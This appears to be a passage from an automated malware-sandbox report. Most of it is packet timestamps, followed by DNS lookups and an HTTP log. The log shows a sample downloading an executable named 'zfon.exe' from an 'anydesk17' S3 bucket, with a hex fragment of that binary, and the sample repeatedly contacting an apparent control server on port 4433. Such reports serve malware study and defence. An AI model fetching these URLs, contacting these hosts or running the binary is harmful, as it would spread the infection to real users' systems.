                                                                                                                                                                          Dec 18, 2024 13:06:42.720601082 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.911992073 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.912008047 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.912043095 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.912141085 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.912153006 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.912250042 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:42.920392990 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:42.970633030 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.163769960 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.163784027 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.163803101 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.163834095 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.163971901 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.163988113 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.164041996 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.409161091 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.409176111 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.409214973 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.409249067 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.409262896 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.409292936 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.409311056 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.642841101 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.642910004 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.643035889 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.643055916 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.643093109 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.643101931 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.651294947 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.705051899 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.868561029 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.868576050 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.868628025 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.868628979 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.868680000 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.868686914 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.868697882 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.868717909 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.868733883 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:43.876774073 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:43.923758984 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.092911959 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.092943907 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.092994928 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.093038082 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.093094110 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.093113899 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.093130112 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.093163013 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.096777916 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.142544985 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.149410009 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.149437904 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.149482965 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.149502039 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.149557114 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.149573088 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.149653912 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.149653912 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.149666071 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.205034971 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.357873917 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.357886076 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.357930899 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.357944012 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.357974052 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.358016968 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.358043909 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.358073950 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.408134937 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.513091087 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513108969 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513147116 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513164043 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513174057 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513179064 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.513199091 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.513216019 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.564400911 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.585967064 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586033106 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586103916 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586129904 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586157084 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.586170912 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.586200953 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.586220980 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.589590073 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.642548084 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.749984026 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.749998093 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750044107 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750058889 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750171900 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.750195980 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.750207901 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.750569105 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.751651049 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.798902988 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.826921940 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.826935053 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.826984882 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.826999903 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.827016115 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.827052116 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.827063084 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.827095985 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.854235888 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854311943 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854334116 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854346991 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854365110 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.854377031 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.854387999 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.854396105 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.908143044 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:44.908159018 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:44.955051899 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058058977 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058072090 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058111906 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058131933 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058135033 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058163881 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058176994 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.058186054 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058213949 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.058222055 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085661888 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085724115 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085726976 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.085741043 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085757971 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085769892 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085777044 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.085803986 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.085813046 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.085850954 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.225781918 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225795984 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225846052 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225945950 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.225961924 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.225981951 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.226006031 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.278734922 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.303488016 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.303513050 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.303596020 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.303610086 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321285009 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321341038 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321383953 CET4434972252.95.162.66192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:45.321393013 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.321475029 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:45.322160959 CET49722443192.168.2.852.95.162.66
                                                                                                                                                                          Dec 18, 2024 13:06:52.798896074 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:52.918484926 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:52.918575048 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.866194963 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.985985041 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.986011982 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.986125946 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.986171007 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:57.614070892 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:57.798762083 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:57.905992031 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025800943 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025862932 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025876999 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.025878906 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:58.145627975 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:14.795324087 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:14.915246964 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:15.323853016 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:15.371191025 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:32.943181038 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:33.062763929 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:33.471837044 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:33.520684958 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:49.896770000 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          Dec 18, 2024 13:07:50.016439915 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:50.425357103 CET44334972427.50.63.8192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:07:50.473802090 CET497244433192.168.2.827.50.63.8
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 18, 2024 13:05:58.532718897 CET6464353192.168.2.81.1.1.1
                                                                                                                                                                          Dec 18, 2024 13:05:58.737714052 CET53646431.1.1.1192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:05.714289904 CET6161653192.168.2.81.1.1.1
                                                                                                                                                                          Dec 18, 2024 13:06:05.930572987 CET53616161.1.1.1192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:19.321496964 CET5641053192.168.2.81.1.1.1
                                                                                                                                                                          Dec 18, 2024 13:06:19.459754944 CET53564101.1.1.1192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.287617922 CET5628853192.168.2.81.1.1.1
                                                                                                                                                                          Dec 18, 2024 13:06:23.497256041 CET53562881.1.1.1192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:34.664942980 CET5309253192.168.2.81.1.1.1
                                                                                                                                                                          Dec 18, 2024 13:06:34.881505966 CET53530921.1.1.1192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:56.894188881 CET5654753192.168.2.81.1.1.1
                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 18, 2024 13:05:58.532718897 CET192.168.2.81.1.1.10x9291Standard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:05.714289904 CET192.168.2.81.1.1.10xc663Standard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:19.321496964 CET192.168.2.81.1.1.10xfcaeStandard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:23.287617922 CET192.168.2.81.1.1.10x59fdStandard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:34.664942980 CET192.168.2.81.1.1.10xc83bStandard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:56.894188881 CET192.168.2.81.1.1.10x249dStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 18, 2024 13:05:58.737714052 CET1.1.1.1192.168.2.80x9291No error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:05:58.737714052 CET1.1.1.1192.168.2.80x9291No error (0)s3-r-w.ap-east-1.amazonaws.com3.5.239.146A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:05:58.737714052 CET1.1.1.1192.168.2.80x9291No error (0)s3-r-w.ap-east-1.amazonaws.com52.95.161.53A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:05.930572987 CET1.1.1.1192.168.2.80xc663No error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:05.930572987 CET1.1.1.1192.168.2.80xc663No error (0)s3-r-w.ap-east-1.amazonaws.com52.95.160.78A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:05.930572987 CET1.1.1.1192.168.2.80xc663No error (0)s3-r-w.ap-east-1.amazonaws.com52.95.161.33A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:19.459754944 CET1.1.1.1192.168.2.80xfcaeNo error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:19.459754944 CET1.1.1.1192.168.2.80xfcaeNo error (0)s3-r-w.ap-east-1.amazonaws.com3.5.239.146A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:19.459754944 CET1.1.1.1192.168.2.80xfcaeNo error (0)s3-r-w.ap-east-1.amazonaws.com52.95.161.58A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:23.497256041 CET1.1.1.1192.168.2.80x59fdNo error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:23.497256041 CET1.1.1.1192.168.2.80x59fdNo error (0)s3-r-w.ap-east-1.amazonaws.com3.5.237.170A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:23.497256041 CET1.1.1.1192.168.2.80x59fdNo error (0)s3-r-w.ap-east-1.amazonaws.com3.5.238.29A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:34.881505966 CET1.1.1.1192.168.2.80xc83bNo error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:34.881505966 CET1.1.1.1192.168.2.80xc83bNo error (0)s3-r-w.ap-east-1.amazonaws.com52.95.162.66A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:34.881505966 CET1.1.1.1192.168.2.80xc83bNo error (0)s3-r-w.ap-east-1.amazonaws.com52.95.162.78A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 18, 2024 13:06:57.033751011 CET1.1.1.1192.168.2.80x249dNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          • anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.8497093.5.239.1464431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:00 UTC94OUTGET /zfon.exe HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-18 12:06:01 UTC447INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: APpzxCZG//eF37uDBK2QKgGWr8Hsb1l50W5nTETEENPeXA8qhO+Nv1DaYLfDBP/Hg+dYIseDCyrvhocCo9MFh4/aqrqAPShS
                                                                                                                                                                          x-amz-request-id: VKCD6DD02MQJMSH8
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:02 GMT
                                                                                                                                                                          Last-Modified: Fri, 13 Dec 2024 18:14:06 GMT
                                                                                                                                                                          ETag: "44ad77338a945fe1451861b59267a68d"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                          Content-Length: 2659840
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:01 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf cc 31 f5 fb ad 5f a6 fb ad 5f a6 fb ad 5f a6 1e f4 5a a7 f9 ad 5f a6 65 0d 98 a6 fa ad 5f a6 c0 f3 5c a7 f8 ad 5f a6 c0 f3 5a a7 e0 ad 5f a6 c0 f3 5b a7 f5 ad 5f a6 c0 f3 5e a7 ff ad 5f a6 09 f4 5b a7 f7 ad 5f a6 29 f6 5a a7 a0 ad 5f a6 86 d4 82 a6 f8 ad 5f a6 6c f3 5a a7 f1 ad 5f a6 f2 d5 cc a6 e1 ad 5f a6 fb ad 5e a6 c7 ac 5f a6 69 f3 5a a7 c8 ad 5f a6 69 f3 5f a7 fa ad 5f
                                                                                                                                                                          Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$1___Z_e_\_Z_[_^_[_)Z__lZ__^_iZ_i__
                                                                                                                                                                          2024-12-18 12:06:01 UTC577INData Raw: 49 23 c6 48 3b d8 73 0f 48 b8 00 00 00 00 00 00 00 80 48 3b c8 73 1a 48 8d 0c 5b 48 c1 e1 03 e8 8c c7 ff ff 48 89 07 48 8b c3 49 23 c6 48 89 47 10 44 0f b6 4c 24 40 48 8b d6 4c 8b 07 48 8b cd e8 eb 02 00 00 48 8b 6c 24 50 48 89 5f 08 48 8b 5c 24 48 48 83 c4 20 41 5e 5f 5e c3 cc cc cc cc 48 3b ca 0f 84 8d 00 00 00 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 48 8b fa 48 8d 59 08 4c 8b 43 08 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 53 f8 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c3 20 48 8d 43 f8 48 3b c7 75 97 48 8b 5c 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                          Data Ascii: I#H;sHH;sH[HHHI#HGDL$@HLHHl$PH_H\$HH A^_^H;WH0HD$ H\$@HHYLCMtI@HcHIIHPHHtHBHcHHHHPHSHtHBHcHHHHPH HCH;uH\$@H0_
